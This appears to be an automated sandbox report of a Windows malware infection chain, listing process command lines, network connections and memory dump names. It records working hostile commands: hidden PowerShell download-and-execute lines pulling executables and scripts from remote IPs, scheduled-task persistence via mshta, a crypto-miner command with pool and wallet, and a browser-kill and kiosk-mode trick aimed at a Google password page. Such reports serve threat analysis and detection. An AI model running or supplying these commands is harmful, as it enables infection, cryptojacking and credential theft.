"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe

"C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn I76AamawRik /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn I76AamawRik /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.cmdline"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4FE0.tmp" "c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\CSCA8772FE477F3431A8E4EB01FFA7070FE.TMP"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE

"C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "1bVtkmaEFba" /tr "mshta \"C:\Temp\4buU3vPam.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\4buU3vPam.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe

"C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4784 -ip 4784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4784 -s 820

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4912"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\ProgramData\rjbum\abfjdu.exe

C:\ProgramData\rjbum\abfjdu.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe

"C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4912"

C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe

"C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe

"C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4912"

C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe

"C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe"

C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe

"C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe"

C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe

"C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1916 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3219f9b-7f74-406f-9bf8-d68635766d42} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2480 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2452 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01c09d46-e774-4e15-ae93-1616266d2440} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3184 -childID 1 -isForBrowser -prefsHandle 1436 -prefMapHandle 2628 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4f67990-34d8-4010-9f43-2286c1a1ceb5} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4120 -childID 2 -isForBrowser -prefsHandle 4112 -prefMapHandle 4108 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3dc32dc-7c8f-4fd4-a5d9-9af212b745cc} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4880 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4872 -prefMapHandle 4868 -prefsLen 32854 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa3abcb1-6eae-4a53-95b8-d1042466a2de} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5212 -childID 3 -isForBrowser -prefsHandle 4696 -prefMapHandle 5180 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c5ed142-abae-401c-8b7c-ee583ef0bbd4} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 4 -isForBrowser -prefsHandle 5360 -prefMapHandle 5368 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {653f8cec-3367-4821-af54-fec38fe8fcf9} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 5 -isForBrowser -prefsHandle 5628 -prefMapHandle 5624 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b22b891f-18d5-4a40-acaf-52150da83d07} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab

C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe

"C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4912"

C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"

C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\92EF.tmp\92F0.tmp\92F1.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4912"

C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwm4ybui\jwm4ybui.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD5B.tmp" "c:\Users\Admin\AppData\Local\Temp\jwm4ybui\CSCD9F6A0106DC94F429C6CF68E69297485.TMP"

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4300 -ip 4300

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 800

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe"

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6740 -ip 6740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 772

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
NL 45.154.98.175:6969 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 80.240.16.67:443 pool.hashvault.pro tcp
NL 185.156.73.73:80 185.156.73.73 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
N/A 127.0.0.1:64028 tcp
N/A 127.0.0.1:64039 tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 34.117.188.166:443 spocs.getpocket.com udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net tcp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.187.206:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.187.206:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
GB 216.58.204.68:443 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 104.21.69.194:443 codxefusion.top tcp
US 8.8.8.8:53 www.dropbox.com udp
GB 162.125.64.18:443 www.dropbox.com tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 213.209.150.137:4266 towerbingobongoboom.com tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r2---sn-aigl6ns6.gvt1.com udp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2.sn-aigl6ns6.gvt1.com tcp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2.sn-aigl6ns6.gvt1.com udp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
DE 5.75.210.149:443 tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/3616-0-0x0000000000D50000-0x0000000001077000-memory.dmp

memory/3616-1-0x0000000077394000-0x0000000077396000-memory.dmp

memory/3616-2-0x0000000000D51000-0x0000000000DB1000-memory.dmp

memory/3616-3-0x0000000000D50000-0x0000000001077000-memory.dmp

memory/3616-4-0x0000000000D50000-0x0000000001077000-memory.dmp

